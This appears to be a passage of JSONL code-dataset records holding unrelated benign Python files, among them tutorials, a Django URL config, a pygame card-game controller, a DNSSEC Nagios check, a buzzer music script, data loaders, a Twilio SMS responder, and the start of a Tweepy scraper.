self.jsondata\n","sub_path":"xai/brain/wordbase/adverbs/_realistically.py","file_name":"_realistically.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"349270592","text":"#!/usr/bin/env python3\n\n# using if\nprint(\"\\nif example:\")\nx = 5\nif x:\n print (\"x is nonzero\")\n\nlines = 500\n\nif lines < 1000:\n print(\"lines is small\")\nelif lines < 10000:\n print(\"lines is medium\")\nelse:\n print(\"lines is large\")\n\n\n# using while\nprint(\"\\nwhile example:\")\nseries = [\"The big bang theory\", \"White collar\", \"Prison break\"]\ni = 0\nwhile i < len(series):\n print(\"series: \", series[i])\n i += 1\n\nseries = [\"White collar\", \"The big bang theory\", \"Prison break\"]\ni = 0\nwhile i < len(series):\n if \"theory\" in str(series[i]):\n print(\"best do watch is\", series[i])\n break\n print(\"not yet\")\n i += 1\n\n# using for ... in\nprint(\"\\nfor ... in example:\")\n\ncountries = [\"Denmark\", \"Finland\", \"Norway\"]\n\nfor country in countries:\n print(country)\n\nfor letter in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" :\n if letter in \"AEIOU\":\n print(letter, \"is a vowel\")\n else:\n print(letter, \"is a consonant\")\n","sub_path":"cp-01-introducao-a-programacao-procedural/flux_controll.py","file_name":"flux_controll.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"579426357","text":"from django.conf.urls import patterns, include, url\nfrom accounts.views import index, home, log_in, register, log_out,all_exercises, each_exercise, profile, give_session, account_status\nfrom user_code.views import result, post_result\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', index, name=\"index\"),\n # url(r'^home$', home, name=\"home\"),\n url(r'^admin', include(admin.site.urls)),\n)\n\n\nurlpatterns += patterns('',\n url(r'^session$', give_session, name=\"sesson\"),\n url(r'^account_status$', account_status, name=\"account_status\"),\n \n # url(r'^profile$', profile, name=\"profile\"),\n url(r'^login$', log_in, name=\"log_in\"),\n url(r'^register$', register, name=\"register\"),\n url(r'^logout$', log_out, name=\"log_out\"),\n )\n\nurlpatterns += patterns('',\n url(r'^exercise/_all$', all_exercises, name ='all_exercises'),\n url(r'^exercise/(?P[-\\w]+)$', each_exercise, name ='each_exercise'),\n)\n\nurlpatterns += patterns('',\n url(r'^code', include('user_code.urls', namespace=\"user_code\")),\n url(r'^post_result$', post_result, name ='post_result'),\n url(r'^result$', result, name ='result'),\n)\n","sub_path":"pmc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"238366593","text":"import pygame\nimport sys\nfrom random import randint\nfrom pygame.locals import *\n\nclass Edge():\n\n def __init__(self, source, sink, capacity):\n self.source = source\n self.sink = sink\n self.capacity = capacity\n\nclass FlowNetwork():\n\n def __init__(self):\n self.adj = {}\n self.flow = {}\n\n def add_vertex(self, vertex):\n self.adj[vertex] = []\n\n def get_edges(self, vertex):\n return self.adj[vertex]\n\n def add_edge(self, source, sink, capacity):\n edge = Edge(source, sink, capacity)\n redge = Edge(source, sink, 0)\n edge.redge = redge\n redge.redge = edge\n self.adj[source].append(edge)\n self.adj[sink].append(redge)\n self.flow[edge] = 0\n self.flow[redge] = 0\n\n def find_path(self, source, sink, path):\n if source == sink:\n return path\n for edge in self.get_edges(source):\n residual = edge.capacity - self.flow[edge]\n if residual > 0 and edge not in path:\n result = self.find_path( edge.sink, sink, path + [edge])\n if result != None:\n return result\n\n def max_flow(self, source, sink):\n path = self.find_path(source, sink, [])\n while path != None:\n residuals = [edge.capacity - self.flow[edge] for edge in path]\n flow = min(residuals)\n for edge in path:\n self.flow[edge] += flow\n self.flow[edge.redge] -= flow\n path = self.find_path(source, sink, [])\n return sum(self.flow[edge] for edge in self.get_edges(source))\n\nclass Vertex():\n\n def __init__(self):\n self.id = randint(0, 1000)\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __hash__(self):\n return self.id\n\n\nclass Controller():\n\n def __init__(self, game):\n self.game = game\n self.choose_attackers = False\n self.choose_blockers = False\n self.choose_target = False\n self.waiting_for_choice = False\n\n def auto_cast(self, card):\n if not self.game.actions.castable(card) or self.game.actions.cast(card):\n return\n g = FlowNetwork()\n source = Vertex()\n sink = Vertex()\n g.add_vertex(source)\n g.add_vertex(sink)\n splitmana = card.manapool.split()\n for mana in splitmana:\n vertex = Vertex()\n mana.vertex = vertex\n g.add_vertex(vertex)\n g.add_edge(vertex, sink, 1)\n for card_on_board in self.player.board.cards:\n for activate in card_on_board.activations:\n vertex = Vertex()\n vertex.activate = activate\n g.add_vertex(vertex)\n g.add_edge(source, vertex, 1)\n if activate.manasource and self.game.actions.activate_able(activate):\n for mana in activate.produce.split():\n for m in splitmana:\n if mana.enough(m):\n g.add_edge(vertex, m.vertex, 1)\n if g.max_flow(source, sink) == card.manapool.converted_mana_cost():\n for mana in splitmana:\n for edge in g.get_edges(mana.vertex):\n if g.flow[edge.redge] > 0:\n self.game.actions.activate(edge.source.activate)\n self.game.actions.cast(card)\n\nclass BotController(Controller):\n\n def __init__(self, game):\n super().__init__(game)\n self.aggressor = True\n\n def choose_target_view(self):\n self.choose_target = False\n card = self.game.actions.waiting_for_target.choose(self.player.targets.cards)\n self.game.actions.choose_target(card)\n\n def choose_blockers_view(self):\n self.choose_blockers = False\n blockers = []\n attackers = []\n for card in self.game.get_turn().board.cards:\n if card.attacking:\n attackers.append(card)\n for card in self.player.board.cards:\n for attacker in attackers:\n if self.game.actions.able_to_block(attacker, card):\n if attacker.get_power() < (card.get_toughness() - card.damage):\n blockers.append((card, attacker))\n attackers.remove(attacker)\n break\n self.game.actions.choose_blockers(blockers)\n\n#TODO\n def choice_view(self):\n self.waiting_for_choice = False\n self.game.actions.choose_may_add_to_stack(True)\n\n def choose_attackers_view(self):\n self.choose_attackers = False\n cards = []\n for card in self.player.board.cards:\n attack = True\n if self.game.actions.able_to_attack(card):\n for opp_card in self.game.get_opponent(self.player).board.cards:\n if self.game.actions.able_to_block(card, opp_card):\n if card.get_power() >= (opp_card.get_toughness() - opp_card.damage):\n if (not self.aggressor and\n (card.get_toughness() - card.damage) <= opp_card.get_power()):\n attack = False\n break\n else:\n attack = False\n break\n if attack:\n cards.append(card)\n self.game.actions.choose_attackers(cards)\n\n def prio(self):\n for card in self.player.hand.cards:\n if card.manapool.converted_mana_cost() == 0:\n if self.game.actions.castable(card):\n self.game.actions.cast(card)\n hand = sorted(self.player.hand.cards,\n key=lambda x: x.manapool.converted_mana_cost(), reverse=True)\n for card in hand:\n self.auto_cast(card)\n self.game.pass_prio()\n\n\nclass PlayerController(Controller):\n\n def __init__(self, game, cardsurfaces, gamezonebuttons):\n super().__init__(game)\n self.cardsurfaces = cardsurfaces\n self.attackers = []\n self.blockers = []\n self.blocker = None\n self.gamezonebuttons = gamezonebuttons\n\n def choose_blockers_view(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_SPACE:\n self.game.actions.choose_blockers(self.blockers)\n self.blockers = []\n self.choose_blockers = False\n self.cardsurfaces.remove_selected()\n self.blocker = None\n if event.type == MOUSEBUTTONUP:\n surface = self.cardsurfaces.card_at_coordinates(pygame.mouse.get_pos())\n if surface != None:\n card = surface.card\n if (self.blocker == None and\n card.owner == self.player):\n surface.selected = True\n self.blocker = card\n elif (self.blocker != None and\n self.game.actions.able_to_block(card, self.blocker)):\n surface.selected = True\n self.blockers.append((self.blocker, card))\n self.blocker = None\n#TODO\n def choice_view(self):\n for event in pygame.event.get():\n if event.type == KEYUP:\n if event.key == K_y:\n self.waiting_for_choice = False\n self.game.actions.choose_may_add_to_stack(True)\n if event.key == K_n:\n self.waiting_for_choice = False\n self.game.actions.choose_may_add_to_stack(False)\n\n def choose_attackers_view(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_SPACE:\n self.game.actions.choose_attackers(self.attackers)\n self.attackers = []\n self.choose_attackers = False\n self.cardsurfaces.remove_selected()\n if event.type == MOUSEBUTTONUP:\n surface = self.cardsurfaces.card_at_coordinates(pygame.mouse.get_pos())\n if surface != None and self.game.actions.able_to_attack(surface.card):\n surface.selected = True\n self.attackers.append(surface.card)\n\n def choose_target_view(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == MOUSEBUTTONUP:\n surface = self.cardsurfaces.card_at_coordinates(pygame.mouse.get_pos())\n if surface != None and self.player.targets.contains(surface.card):\n self.choose_target = False\n self.game.actions.choose_target(surface.card)\n\n def prio(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_SPACE:\n self.game.pass_prio()\n if event.type == MOUSEBUTTONUP:\n surface = self.cardsurfaces.card_at_coordinates(pygame.mouse.get_pos())\n if surface != None:\n card = surface.card\n if (card.owner.hand.contains(card) and\n self.game.actions.castable(card)):\n self.auto_cast(card)\n elif card.owner.board.contains(card):\n for activation in card.activations:\n if self.game.actions.activate_able(activation):\n self.game.actions.activate(activation)\n self.gamezonebuttons.check_and_hit_button(pygame.mouse.get_pos())\n\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":9977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"376357887","text":"import cx_Freeze\n\nexecutables = [cx_Freeze.Executable(\"maze-game.py\")]\n\ncx_Freeze.setup(\n name=\"Block Maze\",\n options={\"build_exe\":{\"packages\":[\"pygame\"],\"include_files\":[\"../data/img\", \"../data/fonts\"]}},\n\n description = \"Block Maze Game\",\n executables = executables\n )\n","sub_path":"block-maze-master/src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"238450345","text":"#! /usr/bin/env python\nimport json\n\nfrom kd_database import KDDatabase\nfrom utils import resolve_filepath, print_error\n\nclass PluginManager:\n def __init__(self):\n self.db = None\n self.plugins = {}\n\n def insert_basic_world(self):\n with open(resolve_filepath('', 'kd_world.json'), 'r') as kd_world_file:\n world = json.load(kd_world_file)\n for key, model_data in world['models'].items():\n self.db.insert_model(key, model_data)\n for key, entity_data in world['entities'].items():\n self.db.insert_entity(key, entity_data)\n\n def config_db(self):\n with open(resolve_filepath('', 'config.json')) as config_file:\n db_config = json.load(config_file)['db']\n db_mode = KDDatabase.DEVELOPMENT_MODE\n if db_config['mode'] == 'test':\n db_mode = KDDatabase.TEST_MODE\n elif db_config['mode'] == 'production':\n db_mode = KDDatabase.PRODUCTION_MODE\n self.db = KDDatabase(\n host=db_config['host'],\n port=db_config['port'],\n name=db_config['name'],\n user=db_config['user'],\n password=db_config['password'],\n mode=db_mode\n )\n self.db.config()\n self.insert_basic_world()\n \n def config_plugins(self):\n with open(resolve_filepath('', 'config.json')) as config_file:\n for plugin_name in json.load(config_file)['plugins']:\n self.plugins[plugin_name] = {\n 'node': None,\n 'process': None\n }\n\n def start(self):\n self.config_db()\n self.config_plugins()\n","sub_path":"scripts/plugin_management/plugin_manager.py","file_name":"plugin_manager.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"145192225","text":"#!/usr/bin/env python\nimport sys\nimport argparse\nimport dns.message\nimport dns.query\nimport datetime\n\nNAGIOS_LEVEL = {'OK': 0,\n 'WARNING': 1,\n 'CRITICAL': 2}\nRRSIG_DATES = {'CURRENT': 0,\n 'WARNING': 8,\n 'CRITICAL': 6}\n\n\ndef _exit(code, message):\n print(message)\n sys.exit(code)\n\n\ndef parse_arg():\n parser = argparse.ArgumentParser()\n parser.add_argument('nameserver', help='nameserver ip address')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_arg()\n server = args.nameserver\n\n request = dns.message.make_query('fhsu.edu', dns.rdatatype.RRSIG)\n response = dns.query.udp(request, server)\n\n answer = response.answer[0]\n type = answer.items[0]\n expiration_date = datetime.datetime.fromtimestamp(type.expiration)\n inception_date = datetime.datetime.fromtimestamp(type.inception)\n\n now = datetime.datetime.now()\n\n difference = expiration_date - now\n RRSIG_DATES['CURRENT'] = difference.days\n status_message = 'rrsig {} days until expiration.'.format(difference.days)\n additional_status_message = 'Expiration date {}\\nUpdated {}'.format(expiration_date.isoformat(),\n inception_date.isoformat())\n\n pref_data = 'Expiration={CURRENT}c;{WARNING};{CRITICAL};0;30'.format(**RRSIG_DATES)\n if difference.days < RRSIG_DATES['CRITICAL']:\n status = 'CRITICAL'\n elif difference.days < RRSIG_DATES['WARNING'] :\n status = 'WARNING'\n else:\n status = 'OK'\n return_message = '{}: {}|{}\\n{}'.format(status, status_message, pref_data, additional_status_message)\n _exit(NAGIOS_LEVEL[status], return_message)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"check_dnssec.py","file_name":"check_dnssec.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"378694183","text":"import pwm\nimport threading\n\nLOW_NOTE_FREQUENCY = 466 # Bb\nHIGH_NOTE_FREQUENCY = 622 # Eb\n\nTEMPO = 120 # bpm\n\n_E4 = 1000000// 330\n_G4 = 1000000// 392\n_A4 = 1000000// 440\n_Ad4= 1000000// 466\n_B4 = 1000000// 494\n_C5 = 1000000// 523\n_Cd5= 1000000// 554\n_D5 = 1000000// 587\n_E5 = 1000000// 659\n_Fd5= 1000000// 698\n_G5 = 1000000// 784\n_A5 = 1000000// 880\n_B5 = 1000000// 988\n_D6 = 1000000// 1175\n\n# Don't start now - Dua Lipa (BassLine)\nmusicSheets = [\n (_E4, 1), (_E5, 1/2, True), (_E4, 3/2), (_E5, 1/2, True), (_A4, 1/4), (_Ad4, 1/4),\n (_B4, 1), (_B5, 1/2, True), (_B4, 1, True), (_B4, 1/4, True), (_B4, 1/4, True), (_Fd5, 1/4), (_E5, 1/4, True), (_D5, 1/4, True), (_B4, 1/4, True),\n (_G4, 1), (_G5, 1/2, True), (_G4, 3/2), (_G5, 1/2, True), (_C5, 1/4), (_Cd5, 1/4),\n (_D5, 1), (_D6, 1/2, True), (_A4, 3/2), (_A5, 1/2, True), (0, 1/2, True)\n ]\n \ndef startStop(buzzer):\n if buzzer.playMusic.is_set():\n buzzer.playMusic.clear()\n else:\n buzzer.playMusic.set()\n \n\nclass Buzzer:\n \n # In microsecondi, come intero\n lowNotePeriod = 1000000//LOW_NOTE_FREQUENCY\n highNotePeriod = 1000000//HIGH_NOTE_FREQUENCY\n \n def __init__(self, buzzerPin, modeHandler):\n self.buzzerPin = buzzerPin\n self.modeHandler = modeHandler\n self.length = 60000//TEMPO\n self.playMusic = threading.Event()\n self.musicThread = thread(self.playSong, prio=PRIO_LOWEST)\n self.lock = threading.Lock()\n \n \n # Suono all'accensione del led\n def playTurnOn(self):\n self.playMusic.clear()\n self.lock.acquire()\n \n # Imposto il periodo del buzzer ed il duty cycle a 50%\n if not self.modeHandler.muted:\n p = self.lowNotePeriod\n pwm.write(self.buzzerPin, p, p//2, MICROS)\n sleep(200) \n p = self.highNotePeriod\n pwm.write(self.buzzerPin, p, p//2, MICROS)\n sleep(300)\n \n pwm.write(self.buzzerPin, 0, 0, MICROS)\n self.lock.release()\n \n \n # Suono allo spegnimento del led\n def playTurnOff(self):\n self.playMusic.clear()\n self.lock.acquire()\n \n if not self.modeHandler.muted:\n p = self.highNotePeriod\n pwm.write(self.buzzerPin, p, p//2, MICROS)\n sleep(200) \n p = self.lowNotePeriod\n pwm.write(self.buzzerPin, p, p//2, MICROS)\n sleep(300)\n \n pwm.write(self.buzzerPin, 0, 0, MICROS)\n self.lock.release()\n \n \n def playSong(self):\n while(True):\n self.playMusic.wait()\n self.lock.acquire()\n i = 0\n while self.playMusic.is_set() and i < len(musicSheets):\n note, size, dotted = musicSheets[i]\n if dotted != True:\n pwm.write(self.buzzerPin, note, note//2, MICROS)\n sleep(int(size*self.length))\n else:\n pwm.write(self.buzzerPin, note, note//2, MICROS)\n sleep(int(1/2*size*self.length))\n pwm.write(self.buzzerPin, 0, 0, MICROS)\n sleep(int(1/2*size*self.length))\n i += 1\n i %= len(musicSheets)\n pwm.write(self.buzzerPin, 0, 0, MICROS)\n self.lock.release()\n \n","sub_path":"buzzerFeedback.py","file_name":"buzzerFeedback.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"584257511","text":"from __future__ import print_function\nimport torch.utils.data as data\nimport os\nimport os.path\nimport torch\nimport numpy as np\nfrom torch.autograd import Variable\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom skimage import segmentation\nimport cv2\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n]\n\ndef erosion(img, kernalSize):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,\n (kernalSize, kernalSize))\n ret,img = cv2.threshold(img,220,1,cv2.THRESH_BINARY)\n mask = cv2.erode(img, kernel, iterations=1)\n return mask\n\ndef dilation(img, kernalSize):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,\n (kernalSize, kernalSize))\n ret,img = cv2.threshold(img,220,1,cv2.THRESH_BINARY)\n mask = cv2.dilate(img, kernel, iterations=1)\n return mask\n\n# def erosion(img, radius):\n# kernel = np.ones((3, 3), np.uint8)\n# mask = cv2.dilate(img, kernel, iterations=radius//2)\n# return mask\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\ndef make_dataset(dir):\n images = []\n assert os.path.isdir(dir), '%s is not a valid directory' % dir\n\n for root, _, fnames in sorted(os.walk(dir)):\n for fname in fnames:\n if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n return images\n\ndef getImage(filename):\n import cv2\n src = cv2.imread(filename,cv2.IMREAD_COLOR)\n img = src.transpose(2,0,1).astype(np.float32)/255.0\n img = Variable(torch.from_numpy(img))\n return img, src\n\nclass DataDataset(data.Dataset):\n def __init__(self, root, crop_size, train=True):\n self.data = make_dataset(root)\n self.len = len(self.data)\n self.trans = get_transform(crop_size, train=train)\n\n def __getitem__(self, index):\n filepath = self.data[index%self.len]\n #print(filepath)\n #A,idx = getImage(filepath)\n A = Image.open(filepath).convert('L')\n A = self.trans(A)\n return A\n\n # for test\n # def __getitem__(self, index):\n # filepath = self.data[index%self.len]\n # A = Image.open(filepath).convert('L')\n # # A = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)\n # if A.size[0] >4000:\n # A = A.resize((A.size[0]//2, A.size[1]//2), Image.BICUBIC)\n # # A = cv2.resize(A, (A.shape[1]//2, A.shape[0]//2), interpolation=cv2.INTER_LINEAR)\n # Asize = A.size\n # A = self.trans(A)\n # return A, filepath, Asize\n\n def __len__(self):\n return self.len\n\n\ndef get_transform(crop_size, train=True):\n transform_list = []\n if train:\n transform_list.append(transforms.RandomCrop(crop_size))\n transform_list.append(transforms.RandomHorizontalFlip())\n transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base=2**8)))\n \n transform_list += [transforms.ToTensor(),\n transforms.Normalize((0.5, ),\n (0.5, ))]\n return transforms.Compose(transform_list)\n\n\ndef __make_power_2(img, base, method=Image.BICUBIC):\n ow, oh = img.size\n h = int(round(oh / base) * base)\n w = int(round(ow / base) * base)\n if (h == oh) and (w == ow):\n return img\n\n __print_size_warning(ow, oh, w, h)\n return img.resize((w, h), method)\n\n# just modify the width and height to be multiple of 4\ndef __adjust(img, mult):\n ow, oh = img.size\n\n # the size needs to be a multiple of this number,\n # because going through generator network may change img size\n # and eventually cause size mismatch error\n # mult = 32\n if ow % mult == 0 and oh % mult == 0:\n return img\n w = (ow - 1) // mult\n w = (w + 1) * mult\n h = (oh - 1) // mult\n h = (h + 1) * mult\n\n if ow != w or oh != h:\n __print_size_warning(ow, oh, w, h)\n\n return img.resize((w, h), Image.BICUBIC)\n\n\ndef __scale_width(img, target_width):\n ow, oh = img.size\n\n # the size needs to be a multiple of this number,\n # because going through generator network may change img size\n # and eventually cause size mismatch error\n mult = 32\n assert target_width % mult == 0, \"the target width needs to be multiple of %d.\" % mult\n if (ow == target_width and oh % mult == 0):\n return img\n w = target_width\n target_height = int(target_width * oh / ow)\n m = (target_height - 1) // mult\n h = (m + 1) * mult\n\n if target_height != h:\n __print_size_warning(target_width, target_height, w, h)\n\n return img.resize((w, h), Image.BICUBIC)\n\n\ndef __print_size_warning(ow, oh, w, h):\n if not hasattr(__print_size_warning, 'has_printed'):\n print(\"The image size needs to be a multiple of 4. \"\n \"The loaded image size was (%d, %d), so it was adjusted to \"\n \"(%d, %d). This adjustment will be done to all images \"\n \"whose sizes are not multiples of 4\" % (ow, oh, w, h))\n __print_size_warning.has_printed = True\n","sub_path":"vae/datasets1.py","file_name":"datasets1.py","file_ext":"py","file_size_in_byte":5088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"280649981","text":"\"\"\"\nDesiccant class\nBrent Maranzano\n2016-04-16\n\"\"\"\nimport pandas as pd\n\n\nclass Desiccant(object):\n \"\"\"\n Define the desiccant inside the container (e.g. type, amount, water...etc).\n\n Class Attributes\n ID : string - unique identification number to lookup parameters\n name : string - Desiccant material.\n mass : float - mass of desiccant (g)\n water_content : float - mass fraction of water contained in the desiccant\n (mass water (mg) / mass dry desiccant (g))\n GAB_parameters : dictionary - {Wm, C, K} GAB constants from lookup file.\n density: float - density of dry desiccant (g/cm^3)\n water : float - total mass of water (g)\n\n Class Methods\n set_properties : Set the properties of the desiccant\n refresh : Refresh the desiccant to a new water content\n equilibrate : Equilibrate the deisccant to a provided RH and set the water content.\n calc_water_content: Calculate the water content from GAB and passed water activity\n \"\"\"\n def __init__(self, ID, mass, **kwargs):\n\n self.set_properties(ID, mass, **kwargs)\n\n def set_properties(self, ID, mass, density=1.0, **kwargs):\n \"\"\"\n Set the properties of the desiccant.\n\n Parameters\n ID : string - Unique identification of the desiccant for the lookup.\n mass : float - Mass of the desiccant.\n optional kwargs\n water_content : float - mass fraction of water in desiccant\n (mass water (mg) / mass dry desiccant (g))\n density : float - density of dry desiccant (g)\n \"\"\"\n store = pd.HDFStore(\"simulation_constants.hdf\", mode=\"r\")\n GAB_constants = store[\"GAB_constants\"]\n store.close()\n\n if ID in GAB_constants.index.values:\n self.ID = ID\n self.name = GAB_constants.loc[\"material\"][\"name\"]\n self.GAB_parameters = GAB_constants.loc[ID][[\"C\", \"K\", \"Wm\"]].to_dict()\n else:\n raise ValueError(\"Desiccant type {} is not defined\".format(ID))\n\n self.mass = float(mass)\n\n if \"water_content\" in kwargs:\n self.water_content = float(kwargs[\"water_content\"])\n elif \"initial_water_activity\" in kwargs:\n self.water_content = \\\n self.calc_water_content(kwargs[\"initial_water_activity\"]) * 1.e3\n else:\n self.water_content = 20.\n\n self.density = float(density)\n\n self.water = self.water_content * self.mass * 1.e-3\n\n def refresh(self, water_content=20., initial_activity=None):\n \"\"\"\n Refresh the desiccant (e.g. replace with equivalent desiccant\n mass with lower water content). Specify either new water\n content (water_content), or initial water activity of the\n desiccant (initial_activity).\n\n Parameters\n water_content: float - Water content of the fresh desiccant\n (mg water / g dry desiccant)\n initial_activity: float - Water activity of the fresh desiccant (unitless)\n \"\"\"\n if initial_activity is None:\n self.water_content = float(water_content)\n else:\n self.water_content = \\\n self.calc_water_content(float(initial_activity))\n\n self.water = self.water_content * self.mass * 1.e-3\n\n def equilibrate(self, aw):\n \"\"\"\n Equilibrate the desiccant to a new water activity.\n\n Parameters\n aw: float - Water activity to equilibrate desiccant.\n \"\"\"\n self.water_content = self.calc_water_content(aw)\n\n self.water = self.water_content * self.mass * 1.e-3\n\n def calc_water_content(self, aw):\n \"\"\"\n Calculate the water content from the GAB parameters at the provided\n water activity.\n\n Parameters\n aw : float - Water activity\n\n return: water_content (mg water / g desiccant)\n \"\"\"\n aw = float(aw)\n Wm = self.GAB_parameters[\"Wm\"]\n C = self.GAB_parameters[\"C\"]\n K = self.GAB_parameters[\"K\"]\n water_content = (Wm*C*K*aw) / ((1-K*aw) * (1-K*aw+C*K*aw)) * 1.e3\n return water_content\n","sub_path":"server/package/desiccant.py","file_name":"desiccant.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"87404538","text":"'''\r\nMIT6001 edX - week1 problem set.\r\n\r\nHangman game.\r\n\r\nLast Updated: 2016-Oct-24\r\nFirst Created: 2016-Oct-24\r\nPython 3.5\r\nChris\r\n'''\r\n\r\ndef q1():\r\n # Paste your code into this box\r\n vowels = ['a', 'e', 'i', 'o', 'u']\r\n #s = 'azcbobobegghakl'\r\n count = len([letter for letter in s if letter in vowels])\r\n print('Number of vowels: %d' % (count))\r\n\r\ndef q2():\r\n s = 'azcbobobegghakl'\r\n count = len([x for x in range(len(s)) if s[x:x+3] == 'bob'])\r\n print('Number of times bob occurs is: %d' % (count))\r\n\r\ndef q3():\r\n s = 'azcbobobegghakl'\r\n #s = 'abcbcd'\r\n\r\n best_string = ''\r\n\r\n for x_let in range(len(s) - 1):\r\n new_string = s[x_let]\r\n while (x_let < len(s) - 1) and s[x_let] <= s[x_let + 1]:\r\n new_string += s[x_let + 1]\r\n x_let += 1\r\n if len(new_string) > len(best_string):\r\n best_string = new_string\r\n\r\n print ('Longest substring in alphabetical order is: %s' % (best_string))\r\n","sub_path":"6001/mit6001_week1.py","file_name":"mit6001_week1.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"97641981","text":"import numpy as np\n\n\nclass NotMNIST:\n def __init__(self):\n trainData, self.trainTarget, validData, self.validTarget, testData, self.testTarget = self.load_data()\n self.trainData = np.reshape(trainData, (trainData.shape[0], 784))\n self.validData = np.reshape(validData, (validData.shape[0], 784))\n self.testData = np.reshape(testData, (testData.shape[0], 784))\n\n print(\"train data dims\", self.trainData.shape, \"train labels dims\", self.trainTarget.shape)\n print(\"eval data dims\", self.validData.shape, \"eval labels dims\", self.validTarget.shape)\n print(\"test data dims\", self.testData.shape, \"test labels dims\", self.testTarget.shape)\n\n def load_data(self):\n with np.load(\"notMNIST.npz\") as data:\n Data, Target = data [\"images\"], data[\"labels\"]\n np.random.seed(521)\n randIndx = np.arange(len(Data))\n np.random.shuffle(randIndx)\n Data = Data[randIndx]/255.\n Target = Target[randIndx]\n trainData, trainTarget = Data[:15000], Target[:15000]\n validData, validTarget = Data[15000:16000], Target[15000:16000]\n testData, testTarget = Data[16000:], Target[16000:]\n return trainData, trainTarget, validData, validTarget, testData, testTarget\n","sub_path":"ECE521_Inference_Algorithms_and_Machine_Learning/assignment3/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"7048406","text":"import os\nimport random\nfrom twilio.rest import Client\nfrom flask import Flask, request, redirect\nfrom twilio.twiml.messaging_response import MessagingResponse\n\napp = Flask(__name__)\n\n@app.route(\"/sms\", methods=['GET', 'POST'])\ndef sms_reply():\n \"\"\"Respond to incoming calls with a simple text message.\"\"\"\n body = request.values.get('Body', None)\n frm = request.values.get('From', None)\n resp = MessagingResponse()\n\n # Message Logic \n seen_it = set()\n with open('assets/response.log','r+') as res:\n for line in res:\n seen_it.add(line.split(' says ')[0])\n\n with open('assets/response.log','a+') as res:\n res.write(frm + \" says \" + body + '\\n')\n\n # 1st Reply Message\n if frm not in seen_it:\n resp.message(\"May the new decade find you great happiness and prosperity.\")\n else: # Subsequent Reply Messages\n emoji = ['🎉','🎊','🥂','🌃','🎆','🎈','🥳']\n resp.message(emoji[random.randint(0,len(emoji)-1)])\n\n return str(resp)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","sub_path":"response_server.py","file_name":"response_server.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"627530737","text":"import tweepy\r\nimport csv\r\nimport datetime\r\nimport numpy as np\r\nimport pandas as pd \r\nfrom tweepy import Stream\r\nfrom tweepy import API\r\nfrom tweepy import Cursor\r\nfrom tweepy.streaming import StreamListener\r\nfrom tweepy import OAuthHandler\r\nfrom datetime import date\r\n\r\nimport twitter_credentials\r\n\r\n# # # # TWITTER AUTHENTICATOR # # # #\r\nclass TwitterAuthenticator():\r\n \"\"\"\r\n Class for handling authentication\r\n \"\"\"\r\n def authenticate_twitter_api(self):\r\n auth = OAuthHandler(twitter_credentials.CONSUMER_KEY, twitter_credentials.CONSUMER_SECRET)\r\n auth.set_access_token(twitter_credentials.ACCESS_TOKEN, twitter_credentials.ACCESS_TOKEN_SECRET)\r\n return auth\r\n\r\n\r\nclass TwitterClient():\r\n def __init__(self, twitter_user=None):\r\n self.auth = TwitterAuthenticator().authenticate_twitter_api()\r\n self.twitter_client = API(self.auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\r\n self.twitter_user = twitter_user\r\n\r\n def get_user_timeline_tweets(self, startDate=datetime.datetime(1,1,1,0,0), endDate=datetime.datetime(9999,1,1,0,0)):\r\n tweets = []\r\n for tweet in 